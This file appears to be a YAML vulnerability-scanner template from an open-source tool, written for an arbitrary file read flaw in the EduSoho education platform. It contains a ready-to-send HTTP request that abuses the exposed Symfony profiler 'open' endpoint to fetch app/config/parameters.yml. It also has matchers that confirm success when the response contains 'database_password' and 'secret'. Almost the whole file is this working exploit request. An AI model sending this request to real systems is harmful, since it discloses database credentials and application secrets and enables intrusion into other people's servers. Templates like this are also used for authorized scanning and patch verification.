dddd/common/config/pocs/edusoho-education-open-fileread.yaml
SleepingBag945 9a83a1b39f dddd v2.0
2024-04-03 06:32:26 +02:00

21 lines
460 B
YAML

id: edusoho-education-open-fileread
info:
name: EduSoho 教培系统 open 文件 file 参数文件读取漏洞
author: SleepingBag945
severity: high
http:
- raw:
- |
GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "database_password"
- "secret"
part: body
condition: and